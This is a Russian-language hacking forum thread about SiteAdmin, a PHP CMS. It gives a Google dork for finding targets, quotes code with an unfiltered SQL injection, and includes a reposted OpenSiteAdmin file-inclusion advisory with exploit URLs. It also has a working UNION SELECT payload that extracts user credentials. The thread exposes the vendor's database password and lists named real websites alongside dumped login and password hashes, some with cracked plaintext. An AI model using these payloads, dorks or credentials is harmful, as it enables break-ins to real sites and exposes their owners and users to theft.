SiteAdmin site: http://as-admin.com version: последняя с оффсайта, а если верить тому, что написано в скриптах, то v.1.4 dork: inurl:line2.php для версии без модреврайта и нечто похожее для версии с модреврайтом уязвимость в файле cnews.lib.php PHP: function printInfo($tpl, $index='', $other_limit=0) { if(!$this->active) return; $id=getParm('art'); if(!$index) $index=$this->url_self; if(!$id) return; $sql="select * from {$this->info_table} info where info.news_id=$id"; $res=mysql_query($sql) or print(mysql_error()); if (@mysql_num_rows($res)) { ................................................................. где функция getParm в файле common.lib.php PHP: function getParm($var_name, $def_val='', $type='', $max=8064) { if(!isset($GLOBALS['uri_set'])||!$GLOBALS['uri_set']) return sGetParm($var_name, $def_val, $type, $max); switch (strtoupper($type)) { //GET case 'G': $var=isset($_GET["$var_name"])?$_GET["$var_name"]:(isset($HTTP_GET_VARS["$var_name"])?$HTTP_GET_VARS["$var_name"]:$def_val); $max=min($max,255); break; //POST case 'P': $var=isset($_POST["$var_name"])?$_POST["$var_name"]:(isset($HTTP_POST_VARS["$var_name"])?$HTTP_POST_VARS["$var_name"]:$def_val); break; //COOKIE case 'C': $var=isset($_COOKIE["$var_name"])?$_COOKIE["$var_name"]:(isset($HTTP_COOKIE_VARS["$var_name"])?$HTTP_COOKIE_VARS["$var_name"]:$def_val); break; //FILES case 'F': $var=isset($_FILES["$var_name"])?$_FILES["$var_name"]:(isset($HTTP_POST_FILES["$var_name"])?$HTTP_POST_FILES["$var_name"]:$def_val); break; //SESSION case 'S': $var=isset($_SESSION["$var_name"])?$_SESSION["$var_name"]:(isset($HTTP_SESSION_VARS["$var_name"])?$HTTP_SESSION_VARS["$var_name"]:$def_val); break; //ENV case 'E': $var=isset($_ENV["$var_name"])?$_ENV["$var_name"]:(isset($HTTP_ENV_VARS["$var_name"])?$HTTP_ENV_VARS["$var_name"]:$def_val); break; //ALL (EXCEPT SESSION & ENV) default: $var=isset($_REQUEST["$var_name"])?$_REQUEST["$var_name"]:$def_val; } if(!is_array($var) && strlen($var)>$max) { $var=substr($var,0,$max); } return $var; } вообщем, никакой фильтрации.. далее есть файл настроек тут з.ы. по оффсайту [email protected]::e7cb5347305e316067fd0f23b763b409 [email protected]::352490db5c690967a62f6c684211b1b5 [email protected]::dad32a5aa256160e695870a6f58646ab [email protected]::2bb56da7e88e7597716e05168b5f53e7 [email protected]::40f464cb41198e44392061b18977b0f4 [email protected]::260b4afd213f0f5742af6a5eb067ffe1 [email protected]::26c723d68b0d815982d39a2e76d3ab72 конфиг PHP: /* Configuration file for "Test" * Created by STM-studio [email protected] * v.1.4 */ $cfg['mysql_server'] ='localhost'; $cfg['mysql_database'] ='as-admin'; $cfg['mysql_user'] ='tarasua'; $cfg['mysql_spassword'] ='1508SuperKap'; $cfg['prefix'] ='sa'; //Префікс таблиць бази даних $cfg['lang'] ='ru,ua,en'; //Наявні мови сайту
OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities Vulnerable Code: PHP: -OpenSiteAdmin/indexFooter.php require_once($path."footer.php"); -OpenSiteAdmin/scripts/classes/DatabaseManager.php require_once($path."OpenSiteAdmin/include.php"); require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php"); -OpenSiteAdmin/scripts/classes/FieldManager.php require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php"); require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php"); ..... .. -OpenSiteAdmin/scripts/classes/Filter.php require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php"); -OpenSiteAdmin/scripts/classes/Form.php require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php"); require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php"); -OpenSiteAdmin/scripts/classes/FormManager.php require_once($path."OpenSiteAdmin/scripts/classes/Form.php"); -OpenSiteAdmin/scripts/classes/LoginManager.php require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php"); -OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php"); Exploit: Code: http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00 http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00 (c)milw0rm.com
Седня просканил сканером и он нашел !57 инъекций. Юзаем: PHP: xxx.com/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+fr om+auth_users+limit+3,10/*&cat=2 Отчет AWVS4 PHP: http://rapidshare.com/files/132908385/__1057___1080___1089___1090___1077___1084___1072____1091___1087___1088___1072___1074___1083___1077__.html И бонус: Code: http://www.e-light.com.ua/line2.php andrei::62a7ba583911f266cd400d8864b86999 http://www.cifrotech.com.ua/line2.php mcm::bc37283c8e236d39f9a74881498eb1d5 http://www.vp.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://vesnasouvenir.com.ua/line2.php [email protected] 40f464cb41198e44392061b18977b0f4 http://piton.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 ops-print.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://pigment.com.ua/line2.php [email protected]::e7cb5347305e316067fd0f23b763b409 2hgjrpfa http://trol.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://expoland.com.ua/line2.php [email protected]::40f464cb41198e44392061b18977b0f4 http://www.eva.dp.ua/line2.php [email protected]::e7cb5347305e316067fd0f23b763b409 2hgjrpfa www.as-admin.com/ [email protected]::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
